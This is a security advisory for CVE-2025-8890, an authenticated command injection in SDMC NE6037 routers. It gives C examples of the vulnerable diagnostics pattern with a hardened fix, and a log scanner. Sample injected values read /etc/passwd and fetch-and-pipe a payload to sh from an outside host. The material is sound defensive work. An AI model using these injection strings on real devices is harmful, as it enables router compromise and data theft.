Full Report
An authorized (post-authentication) shell command injection vulnerability (CVE-2025-8890) has been found in SDMC NE6037 routers.
Analysis Summary
# Vulnerability: Authorized Shell Command Injection in SDMC NE6037 Routers
## CVE Details
- CVE ID: CVE-2025-8890
- CVSS Score: Not provided in the source. Rated **High** here because the outcome is arbitrary OS command execution on the device, gated only by an administrative login.
- CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))
## Affected Systems
- Products: SDMC NE6037 routers
- Versions: All versions before 7.1.12.2.44
- Configurations: N/A. The flaw is in the firmware's network diagnostics tool, so any configuration of an affected version is exposed as soon as the administrative portal is reachable.
## Vulnerability Description
The network diagnostics tool in the management portal of affected SDMC NE6037 firmware passes user-controlled input into an operating system shell command without neutralising shell metacharacters (CWE-78). An attacker who is already authenticated to the administrative portal (which is normally reachable only from the LAN side) can therefore inject and execute arbitrary shell commands on the router.
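The pattern described above, as an added example that is not SDMC's firmware code: a diagnostics handler that pastes the user's target host into a shell command line, beside a hardened version that allow-lists the parameter and execs the binary without a shell. The handler shape, the `ping -c 4` command and the `host` parameter are assumptions for illustration; the page only says "network diagnostics tool".

```c
/*
 * Added example (not SDMC firmware code). Assumes a diagnostics page that
 * takes a "host" parameter and originally shelled out to ping via system().
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

#define CMD_MAX 256
static char g_cmd[CMD_MAX];

/* VULNERABLE: the user-controlled host is concatenated into a shell command
 * line and (in the original design) handed to system(). A value such as
 * "8.8.8.8; cat /etc/passwd" runs a second command of the attacker's choice.
 * Returns the command string that would reach the shell, or NULL if too long. */
const char *build_ping_command_vulnerable(const char *host)
{
    int n = snprintf(g_cmd, sizeof g_cmd, "ping -c 4 %s", host);
    if (n < 0 || (size_t)n >= sizeof g_cmd) return NULL;
    return g_cmd;   /* would be passed to system(g_cmd) */
}

/* Hardened step 1: allow-list the parameter. A hostname or an IPv4/IPv6
 * literal only needs [A-Za-z0-9.:-] (internationalised names must be
 * punycoded first). Everything else, including every shell metacharacter,
 * is rejected. A leading '-' is refused so it cannot become a ping option. */
int diag_host_is_valid(const char *host)
{
    size_t len = strlen(host);
    if (len == 0 || len > 253) return 0;
    if (host[0] == '-') return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!(isalnum(c) || c == '.' || c == ':' || c == '-')) return 0;
    }
    return 1;
}

/* Hardened step 2: no shell at all. Build an argv and exec ping directly, so
 * even if a metacharacter slipped past validation it would only ever be part
 * of the host argument. Returns ping's exit status, or -1 on refusal/error. */
int run_ping_hardened(const char *host)
{
    if (!diag_host_is_valid(host)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "ping", "-c", "4", (char *)host, NULL };
        execvp("ping", argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *evil = "8.8.8.8; cat /etc/passwd";
    printf("vulnerable path would run: %s\n", build_ping_command_vulnerable(evil));
    printf("hardened validator accepts \"%s\": %d\n", evil, diag_host_is_valid(evil));
    printf("hardened run of \"%s\": %d (refused)\n", evil, run_ping_hardened(evil));
    return 0;
}
```

Both hardening steps are needed: the allow-list alone still depends on every future code path remembering to call it, and exec-without-shell alone still lets a leading `-` be parsed as an option, which is why the validator refuses it.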
## Exploitation
- Status: The source gives no information on in-the-wild exploitation or a public proof of concept; the issue was handled through coordinated vulnerability disclosure with CERT Polska.
- Complexity: Low once an administrative session exists; the gating factor is Privileges Required: **High** (valid administrative credentials for the management portal).
- Attack Vector: **Adjacent** (the administrative portal is usually reachable only from the LAN; if remote management is enabled on the WAN side, the vector becomes Network).
## Impact
- Confidentiality: High (arbitrary commands can read configuration, credentials and traffic, and exfiltrate them from the device)
- Integrity: High (device configuration, firmware state and forwarding behaviour can be modified)
- Availability: High (the device can be rebooted, its services stopped or its configuration broken)
## Remediation
### Patches
- Patch Version: Upgrade to firmware 7.1.12.2.44 or later.
### Workarounds
- None published. Because exploitation requires an administrative session, the interim measures are: replace default administrative credentials with strong ones, keep remote (WAN-side) management disabled so the portal stays LAN-only, restrict which LAN hosts can reach the management interface, and log out of the portal when finished.
## Detection
- Indicators of compromise: requests to the diagnostics function whose target-host parameter contains shell metacharacters (`;`, `|`, `&`, backticks, `$(`), possibly percent-encoded; unexpected processes, scheduled tasks or files on the device following an administrative session.
- Detection methods and tools: log or proxy the management interface and inspect diagnostics submissions for the metacharacters above after decoding; monitor for outbound connections originating from the router itself (as opposed to forwarded client traffic) to unknown hosts, which would indicate a downloaded payload or reverse shell; verify that the running firmware is 7.1.12.2.44 or later.
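The log-inspection method above, as an added example (not vendor code and not CERT Polska tooling): a scanner that pulls the diagnostics `host` parameter out of management-portal request log lines, percent-decodes it, and flags shell metacharacters. The one-line-per-request log format, the `/diag` path and the `host=` parameter name are assumptions, and the sample log lines are constructed for the example.

```c
/*
 * Added detection example. Assumes the router (or a proxy/syslog forwarder in
 * front of it) records management-portal requests one per line and that the
 * diagnostics form submits the target as a "host=" parameter. The log lines
 * in SAMPLE_LOG are constructed, not captured from a real device.
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define PARAM_MAX 512

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Percent-decode into out ('+' becomes a space, as HTML forms encode it).
 * Decoding first matters: an attacker sends ';' as %3B to dodge naive greps. */
static void url_decode(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    for (size_t i = 0; in[i] && o + 1 < outlen; i++) {
        if (in[i] == '%' && hexval(in[i + 1]) >= 0 && hexval(in[i + 2]) >= 0) {
            out[o++] = (char)(hexval(in[i + 1]) * 16 + hexval(in[i + 2]));
            i += 2;
        } else if (in[i] == '+') {
            out[o++] = ' ';
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
}

/* Copy the value of "<name>=" from the logged query string (stops at '&' or whitespace). */
static int extract_param(const char *line, const char *name, char *out, size_t outlen)
{
    char key[64];
    snprintf(key, sizeof key, "%s=", name);
    const char *p = strstr(line, key);
    if (!p) return 0;
    p += strlen(key);
    size_t o = 0;
    while (*p && *p != '&' && !isspace((unsigned char)*p) && o + 1 < outlen)
        out[o++] = *p++;
    out[o] = '\0';
    return 1;
}

/* The sequences that chain or substitute a second shell command. A hostname or
 * IP literal never legitimately contains any of them. */
int has_shell_metachar(const char *value)
{
    static const char *const seqs[] = { ";", "|", "&", "`", "$(", "\n", "\r", ">", "<", NULL };
    for (int i = 0; seqs[i]; i++)
        if (strstr(value, seqs[i])) return 1;
    return 0;
}

/* 1 if the line carries a diagnostics host parameter with shell metacharacters
 * after decoding, else 0. */
int line_is_suspicious(const char *line)
{
    char raw[PARAM_MAX], decoded[PARAM_MAX];
    if (!extract_param(line, "host", raw, sizeof raw)) return 0;
    url_decode(raw, decoded, sizeof decoded);
    return has_shell_metachar(decoded);
}

int count_suspicious(const char *const *lines, size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++) hits += line_is_suspicious(lines[i]);
    return hits;
}

/* Constructed sample: two benign diagnostics calls and two injection attempts,
 * the second with the separator and pipe percent-encoded. */
const char *const SAMPLE_LOG[] = {
    "2025-08-12T09:14:02Z 192.168.1.50 admin POST /diag host=8.8.8.8&count=4",
    "2025-08-12T09:14:40Z 192.168.1.50 admin POST /diag host=8.8.8.8;cat+/etc/passwd&count=4",
    "2025-08-12T09:15:11Z 192.168.1.50 admin POST /diag host=8.8.8.8%3Bwget%20http%3A%2F%2F203.0.113.7%2Fx%7Csh&count=4",
    "2025-08-12T09:16:03Z 192.168.1.51 admin POST /diag host=gateway.example.net&count=4",
};
const size_t SAMPLE_LOG_LEN = sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0];

int main(void)
{
    for (size_t i = 0; i < SAMPLE_LOG_LEN; i++)
        printf("%s %s\n", line_is_suspicious(SAMPLE_LOG[i]) ? "ALERT" : "ok   ", SAMPLE_LOG[i]);
    printf("%d suspicious of %zu lines\n", count_suspicious(SAMPLE_LOG, SAMPLE_LOG_LEN), SAMPLE_LOG_LEN);
    return 0;
}
```

Run it against a real log export after adjusting the parameter name and path to what the device actually records; the third sample line shows why decoding must precede the metacharacter check, since neither `;` nor `|` appears literally in it.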
## References
- Vendor advisory: SDMC (disclosure coordinated by CERT Polska)
- Relevant links:
- [https://www.cve.org/CVERecord?id=CVE-2025-8890](https://www.cve.org/CVERecord?id=CVE-2025-8890)
- [https://cert.pl/en/cvd/](https://cert.pl/en/cvd/)